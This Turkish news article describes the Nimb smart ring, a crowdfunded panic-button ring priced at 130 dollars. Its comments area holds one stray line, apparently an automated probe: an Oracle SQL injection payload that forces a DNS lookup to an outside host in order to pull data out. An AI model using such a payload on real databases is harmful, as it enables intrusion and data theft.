Akıllı Yüzük "Nimb"

Saldırı anında yardım isteyebileceğiniz bir yüzüğünüzün olmasını ister miydiniz? Saldırı anında yardım isteyebileceğiniz yardım butonunu Nimb parmağımıza kadar getiriyor. Detaylar haberimizde...
08 Mart 2017 14:59
Akıllı Yüzük "Nimb"
Şimdiye kadar saldırılara karşı önlem almayı sağlayan birçok sistem geliştirildi. Bunlardan bazıları kullanıcılarını güvenli olmayan alanlar için uyarıyor, bazıları ise saldırı sırasında yardım istemeye olanak sunuyor. İkinci kategoride yer alan Nimb yardım butonunu parmağımıza kadar getiriyor.
 
 
Aslına bakarsanız Nimb başlatılan bir Indiegogo projesiyle hayata geçirildi. Dışarıdan bakıldığında büyük bir yüzüğü andıran Nimb’in altında gizli bir buton yer alıyor.
 
 
Burada üç saniyeden uzun süre baskı uyguladığınızda yardım sistemi harekete geçiyor ve daha önceden belirlediğiniz üç kişiyle irtibata geçiliyor. Onlara bulunduğunuz konum ve yardıma ihtiyacınız olduğu iletiliyor. Eğer aylık olarak ekstra 10 dolarlık bir ödeme yapmayı kabul ederseniz hizmetin kapsamı genişliyor. Yardıma ihtiyacınız olduğu bilgisi 7/24 hizmet veren bir çağrı merkezine iletiliyor. Aynı zamanda akıllı telefonunuzun ses kaydı özelliği de devreye sokuluyor.
 
 
Şimdiye kadar saldırıya uğrama durumunda yardım istemeyi olanaklı hale getiren birçok sistem geliştirildi. Bunların en büyük sorunu saldırıya uğradığınız anda elinizde olmazsa hiçbir işe yaramamalarıydı.
 
 
Yüzüğe eklenen buton sayesinde bu problem ortadan kaldırılmış oluyor. Arzu edenler bu özel yüzüğe 130 dolar karşılığında sahip olabiliyor. Siyah ve beyaz olmak üzere iki farklı renk seçeneğine sahip olan Nimb mayıs ayından itibaren kullanıcılara gönderilmeye başlanacak.
 
 
 
 
log
984973
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
23 Temmuz 2017, Pazar 15:34
merhaba bu yüzük ne gibi yerlerde satışa sunulur
Bu haberler ilginizi çekebilir